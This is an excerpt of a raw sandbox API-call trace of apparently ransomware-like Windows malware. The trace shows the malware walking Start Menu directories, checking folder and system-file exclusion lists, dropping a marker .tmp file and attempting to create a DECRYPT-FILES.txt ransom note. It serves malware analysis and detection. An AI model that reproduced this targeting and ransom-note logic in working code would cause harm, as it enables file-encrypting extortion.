(lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch=":\\Windows") returned 0x0 [0182.406] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Games\\") returned 0x0 [0182.406] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.406] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.406] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.406] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.406] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.406] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\All Users") returned 0x0 [0182.406] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.406] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="AhnLab") returned 0x0 [0182.407] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.407] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 84 [0182.407] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.407] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\0a16c9.tmp") returned 95 [0182.407] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0182.407] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 84 [0182.407] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.407] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\DECRYPT-FILES.txt") returned 102 [0182.407] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.411] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 84 [0182.411] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*" [0182.411] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefbf6b00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefbf6b00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0182.411] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.411] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefbf6b00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefbf6b00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.411] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.411] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.411] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefbf6b00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefbf6b00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefbf6b00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.411] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.411] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.411] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.411] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.411] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.412] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.412] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.412] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.412] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.412] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.412] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.412] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.412] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.412] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.412] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.412] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned 84 [0182.412] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.412] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\" [0182.412] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\0a16c9.tmp" [0182.412] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.412] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.412] CloseHandle (hObject=0x0) returned 0 [0182.412] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.413] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0182.413] lstrcmpW (lpString1="Accessories", lpString2=".") returned 1 [0182.413] lstrcmpW (lpString1="Accessories", lpString2="..") returned 1 [0182.413] lstrcatW (in: lpString1="Accessories", lpString2="\\" | out: lpString1="Accessories\\") returned="Accessories\\" [0182.413] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Accessories\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\" [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Program Files") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch=":\\Windows") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Games\\") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\All Users") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="AhnLab") returned 0x0 [0182.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.413] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 96 [0182.413] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.413] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\0a16c9.tmp") returned 107 [0182.413] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0182.414] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 96 [0182.414] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.414] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\DECRYPT-FILES.txt") returned 114 [0182.414] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.414] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 96 [0182.414] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*" [0182.414] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefbf6b00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefbf6b00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0182.414] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.414] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefbf6b00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefbf6b00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.414] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.414] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.414] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefbf6b00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefbf6b00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefbf6b00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.414] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.414] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.414] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.414] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.414] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.414] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.414] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.414] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.414] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.414] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.415] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.415] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.415] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.415] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.415] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.415] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 96 [0182.415] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.415] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\" [0182.415] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\0a16c9.tmp" [0182.415] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.415] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.415] CloseHandle (hObject=0x0) returned 0 [0182.415] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.415] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac219a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac219a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0182.415] lstrcmpW (lpString1="Accessibility", lpString2=".") returned 1 [0182.415] lstrcmpW (lpString1="Accessibility", lpString2="..") returned 1 [0182.415] lstrcatW (in: lpString1="Accessibility", lpString2="\\" | out: lpString1="Accessibility\\") returned="Accessibility\\" [0182.416] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="Accessibility\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\" [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Program Files") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch=":\\Windows") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Games\\") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\All Users") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="AhnLab") returned 0x0 [0182.416] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.416] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 110 [0182.416] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.416] wsprintfW (in: param_1=0x36fdb84, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\0a16c9.tmp") returned 121 [0182.416] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x28c [0182.417] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start 